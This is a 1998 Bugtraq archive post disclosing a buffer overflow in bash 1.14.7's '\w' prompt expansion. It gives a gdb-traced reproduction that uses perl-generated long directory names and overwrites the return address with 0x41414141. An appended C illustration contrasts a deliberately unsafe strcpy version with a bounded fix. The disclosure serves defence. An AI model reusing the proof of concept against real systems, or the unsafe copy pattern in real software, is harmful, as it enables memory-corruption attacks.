Bugtraq mailing list archives
Buffer overflow in bash 1.14.7(1)
From: root () EINSTEIN DHIS EU ORG (Joao Manuel Carolino)
Date: Fri, 4 Sep 1998 16:09:28 +0000
If you cd into a directory which has a path name larger than 1024 bytes and you have '\w' included in your PS1 environment variable (which makes the path to the current working directory appear in each command line prompt), a buffer overflow will occur.

The following was tested on my machine, running Slackware 3.5:

einstein:~# gdb bash
[...]
(gdb) r
Starting program: /bin/bash
bash# PS1='\w '
~ cd /tmp
/tmp mkdir `perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp cd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x804ed72 in sigprocmask ()
(gdb) backtrace
#0  0x804ed72 in sigprocmask ()
#1  0xe9 in ?? ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.

Regards,
Joao
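As an added illustration (not bash 1.14.7's own code, and not part of the original post): a model of the fixed 1024-byte prompt buffer the report describes, with the unbounded copy that overruns it next to a bounded replacement that truncates instead. Only the 1024 figure and the 255-byte 'A' components come from the post; the function names and the constructed test path are assumptions.

```c
#include <stdlib.h>
#include <string.h>

/* Fixed prompt buffer, sized to the 1024-byte limit the post reports.
 * This models the bug class; it is not bash's actual source. */
#define PROMPT_BUF 1024

/* Constructed input: 'components' components of 'component_len' 'A's, each
 * preceded by '/', mirroring the post's mkdir/cd sequence. Caller frees. */
char *make_deep_path(size_t components, size_t component_len) {
    size_t total = components * (component_len + 1);
    char *p = malloc(total + 1);
    if (p == NULL) return NULL;
    size_t pos = 0;
    for (size_t i = 0; i < components; i++) {
        p[pos++] = '/';
        memset(p + pos, 'A', component_len);
        pos += component_len;
    }
    p[pos] = '\0';
    return p;
}

/* Vulnerable pattern: '\w' expanded with unbounded copies into a fixed
 * buffer; a cwd longer than the buffer writes past its end. Contrast only. */
void expand_prompt_unsafe(char *out, const char *cwd) {
    strcpy(out, cwd);
    strcat(out, " ");
}

/* Hardened form: every write is bounded by outsz. A cwd that does not fit is
 * shown as "..." plus its tail. Returns 1 if cwd fit, 0 if truncated. */
int expand_prompt_safe(char *out, size_t outsz, const char *cwd) {
    const char *marker = "...";
    size_t mlen = strlen(marker), clen = strlen(cwd);
    if (outsz < mlen + 2) { if (outsz) out[0] = '\0'; return 0; }
    if (clen + 2 <= outsz) {              /* cwd + ' ' + NUL fits */
        memcpy(out, cwd, clen);
        out[clen] = ' ';
        out[clen + 1] = '\0';
        return 1;
    }
    size_t keep = outsz - mlen - 2;       /* bytes of the tail we can show */
    memcpy(out, marker, mlen);
    memcpy(out + mlen, cwd + clen - keep, keep);
    out[outsz - 2] = ' ';
    out[outsz - 1] = '\0';
    return 0;
}
```

The five-component path from the post is 1280 bytes before the leading /tmp is even counted, so the unsafe expansion cannot fit in PROMPT_BUF, while the bounded version always terminates within the buffer.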
Current thread:
- Buffer overflow in bash 1.14.7(1) Joao Manuel Carolino (Sep 04)
- Re: Buffer overflow in bash 1.14.7(1) Michael Riepe (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Chet Ramey (Sep 08)